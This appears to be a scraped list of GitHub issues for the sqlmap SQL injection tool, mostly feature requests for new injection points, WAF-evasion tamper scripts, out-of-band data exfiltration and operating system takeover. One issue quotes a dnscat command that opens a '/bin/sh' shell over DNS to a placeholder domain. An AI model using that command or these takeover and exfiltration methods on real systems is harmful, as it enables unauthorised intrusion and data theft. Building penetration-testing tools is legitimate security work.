sqlmapproject / sqlmap Goto Github PK

Add support to test and exploit SQLi in any header of the request.
This requires some refactoring and a layer of abstraction when parsing params/values.

the newly added switches/options are not documented in the manual.
Examples: --hex, --host, --force-ssl, --titles, --check-tor, ....

But they are visible using the -h option so its no big deal ;)

This is related to issue #46.

• Using XML in MS SQL Server 2005 and 2008
• Using GROUP_CONCAT() on MySQL
• Using XML functions on Oracle (10g has sys.stragg())

References:

• http://delicious.com/inquis/oracle

Design and implement a mechanism to identify a session expire (eg. 302 to /login page, not Set-Cookie issued, etc) and automatically re-authenticate given the raw authentication request from the user.

Test

Add support to generate a report, at least in XML/XSLT format.

PostgreSQL 9.0, 9.1 and 9.2 are out since a while now. We need to compile UDFs for those versions too, both 32-bit and 64-bit on Linux and Windows.

We have a clean mechanism to handle custom DBMS specific statements when they do not fit in xml/queries.xml, we should rather use it and remove all hard-coded custom statements from the source code.

Closely related to issue #33.

Possible enhancements to --crawl are:

• Parse forms (maybe integrate with clientform library).
• Perform POST requests with bogus data defined in a text file in txt/.

We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.

DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.

Example of string on the authoritative DNS server for tun.yourdomain.org:
sudo ./dnscat --listen

Example of string of the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"

Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.

Create test environment (as in .SQL files to create table with relevant encoding + entries) for localized data like russian, portuguese and chinese and binary data (like an image to test safe2bin).

Identify linked/cluster DBMS servers when possible (e.g. MSSQL)

It would be great to give sqlmap a WSDL file or WSDL url, it parses it and start assessing each tag method for SQL injections. Example: http://demo.testfire.net/bank/ws.asmx?WSDL.

Support for SOAP parsing/injection has been already implemented, see http://bernardodamele.blogspot.com/2010/06/sqlmap-and-soap-based-web-services.html. Need to extend it to forge different "URLs" for each method of the parsed WSDL.

Rewrite --update to update sqlmap from GitHub ('git pull' and GitPython or another library)

Update function/class/method docstrings (where applicable)

Add support to search for a specific row in the table given its content snippet (LIKE '%value of -E%')

• Pass parameter name to tamper script.
• Re-consider passing headers to tamper script.
• Further automation of selection based on identified web server, web api, etc.. which requires some more global vars set in tamper scripts.
• **kwargs "support"?

Add basic/advanced help mechanism

• MSSQL: OPENROWSET
• PgSQL: dblink()

Add support to takeover the file system when the back-end DBMS is Oracle.

References:

• http://delicious.com/inquis/oracle

Discuss and implement solution for DBMS specific detection/enumeration limitations:

• Firebird needs a proper string unescaping - but we don't know (in time of testing) the version of the backend firebird, hence we don't know if the unescaping meant for the >=2.1 will work on it.
• IBM DB2 needs the UNION payload with exact datatypes to detect/exploit UNION query SQLi - NULL does not work, one number for each column neither if the data type is varchar, etc.

Add support to automatically parse JSON data (eg. {"prefixText":"abc","count":20}) and be able to test and exploit SQLi in each JSON param's value.

It would be great if you can disable the password cracking feature with another parameter when running in batch mode.
Sometimes you only want to extract the data and using the --batch switch is the only way to extract a big database in the background.

Adapt dbms modules/methods/xml queries file for usage with different versions of the dbms.

For instance, kb.dbmsVersion is already used within MSSQL to determine how to re-enable the xp_cmdshell procedure. This will also be useful for Firebird and in general replaces the ugly "query"/"query2" used in the queries.xml with some proper "minver"/"maxver" that specify which query apply to which dbms version.

To be worked closely to ticket #24.

Recently we implemented DNS for data fetching. The objective is to implement more out-of-band techniques for data fetching:

• HTTP requests (Oracle UTL_HTTP)
• openrowset (to replicate dbms remotely on MSSQL)
• db_link() (to replicate dbms remotely on PgSQL)

Some relevant materials:

• http://www.hideaway.net/2007/08/out-of-band-oracle-sql-injection-with.html
• http://www.learnsecurityonline.com/offerings/videos/non-lso/165-defcon-15-t202-sql-injection-and-out-of-band-channeling

Maybe it would be good to use some sql parser, http://pyparsing.wikispaces.com/
See:

• http://pyparsing.wikispaces.com/file/view/simpleSQL.py
• http://pyparsing.wikispaces.com/file/view/select_parser.py

Work on this alongside issue #44.

One directory (procs/) with usable PL/SQL, SQL and T-SQL scripts which can be injected when stacked queries are supported or with direct connection (-d).

Closely related to issue #51.

"Looks like sqlmap has an issue while using --random-agent with -g argument as it always returns "unable to find results for your Google dork expression" though it works fine without suppling --random-agent."

When stacked queries is supported use OPENROWSET (MSSQL) and dblink() (PostgreSQL) to run a statement as a different user (e.g. higher privileged user for instance after a password cracking attack).

The same library code can be used in ticket #31.

• Add more tamper scripts (e.g. ability to test for addslahes bypasses using big5 or GBK characters).
• Suggest tamper scripts in due course following fingerprint of technology, back-end DBMS, etc.

References:

• http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
• http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
• http://www.f5.com/pdf/white-papers/sql-injection-detection-wp.pdf
• http://www.www.packetstormsecurity.org/papers/bypass/SQL_Injection_Evasion.pdf
• https://docs.google.com/Doc?docid=0AZNlBave77hiZGNjanptbV84Z25yaHJmMjk&hl=en
• http://websec.wordpress.com/
• https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt
• http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
• http://websec.wordpress.com/2010/05/07/exploiting-hard-filtered-sql-injections-2-conditional-errors/
• http://websec.wordpress.com/2010/05/26/exploiting-hard-filtered-sql-injections-3/
• http://blog.spiderlabs.com/2011/06/announcing-the-modsecurity-sql-injection-challenge.html
• http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
• http://websec.files.wordpress.com/2010/11/sqli2.pdf
• http://twitter.com/#!/lightos
• http://sla.ckers.org/forum/read.php?12,30425
• http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
• http://lavakumar.com/Split_and_Join.pdf # --hpp
• http://www.lavakumar.com/modsecurity_hpp.txt # --hpp
• http://ptresearch.blogspot.com/search/label/waf
• http://sla.ckers.org/forum/read.php?16,36514,36514#msg-36514
• http://sla.ckers.org/forum/read.php?16,20156,20179#msg-20179

Adding full support for another dbms is a pain in the ass 'cause around the whole code there's stuff like if kb.dbms == "MySQL" [...] elif kb.dbms in ( "Oracle" etc.. it would be very intelligent to remove this dbms specific stuff in libs like lib/core/agent.py (grep for kb.dbms, you'll see) and have it ALL would be nice in plugins/dbms//language.py or similar so code would be much easier to maintain and most important far easier to add a new dbms.

Add support to takeover the file system when the back-end DBMS is IBM DB2

Add support to takeover the operating system when the back-end DBMS is IBM DB2

In both --file-upload and --os-pwn provide the user with the option to download onto the DBMS filesystem the payload stager (or shellcodeexec executable) via HTTP/TFTP/FTP server from the attacker (or a staged third-party server) machine rather than uploading it via SQL payload's file write methods.

Port the same concept eventually to --file-download too.

Libraries:

• FTP server: http://code.google.com/p/pyftpdlib/ (MIT License).
• TFTP server: http://tftpy.sourceforge.net/ (MIT License).
• HTTP server: either http://docs.python.org/library/basehttpserver.html or http://docs.python.org/library/simplehttpserver.html (both part of Python interpreter).

I think that this can be done taking advantage of the object that handles --forms (forms parsing) switch.

Create some test environment pages for injecting into PL/SQL code (Oracle) and T-SQL statements (MSSQL).

Quoting a user:

The problem is that vulnerable list.php script limits number of outputted items --- it always show only first 10 items omitting others on PHP level (without using MySQL LIMIT clause), so sqlmap incorrectly detects number of columns, number of rows etc --- always limiting number of items to 10.

I looked in documentation and didn't found any options for splitting enumeration requests on bunch of requests limited by some value of outputted items (e.g. query all table rows selecting by 10 rows at single query). Can you add such options or tell me how can I achieve my goal with current version of sqlmap (I'm using trunk version)?

Another suggestion:

Also I want to propose checking if all of requested items was received by adding extra UNION SELECT at end with some end mark and checking is that end mark is received. I don't know details of sqlmap implementation so not sure is my proposition is correct.

Example:

Send your requests to /post.php but look at/fetch /index.php after you submitted to /post.php for detection/exploitation

Check and eventually implement new/updated blind sql injection exploitation techniques:

• http://websec.wordpress.com/2011/04/06/blind-sqli-techniques/
• http://websec.ca/blog/view/optimized_blind_sql_injection_data_retrieval
• http://pen-testing.sans.org/blog/2011/10/31/making-blind-sql-injection-more-efficient-new-tool

There are noticed cases when last character of output is trimmed:
[15:02:01] [INFO] testing MySQL
[15:02:03] [WARNING] reflective value(s) found and filtering out
[15:02:03] [WARNING] possible server trimmed output detected (due to its length): 1:ugd-->

Both for attacker (after the DBMS fingerprint output) and for developer/DBA (at the end, just before the "shutting down" message).
Report also about known vulnerabilities based on DBMS exact version (consider backporting!) and known Metasploit exploits.

Now that Metasploit properly runs on Windows too (without cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, --os-pwn/--os-smbrelay/--os-smb code need to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.

Enumerate binary fields data as in images for instance

Possible references:

• http://stackoverflow.com/questions/948174/how-do-i-convert-from-blob-to-text-in-mysql

Add support to takeover the operating system when the back-end DBMS is Oracle.

References:

• http://delicious.com/inquis/oracle

test

• Move simpleConcatQuery() function to xml/queries.xml
• Move getDelayQuery() function to xml/queries.xml once issue #154 is worked too as the time delay check/queries depends upon the version on some DBMSes.

To be worked on closely to ticket #23.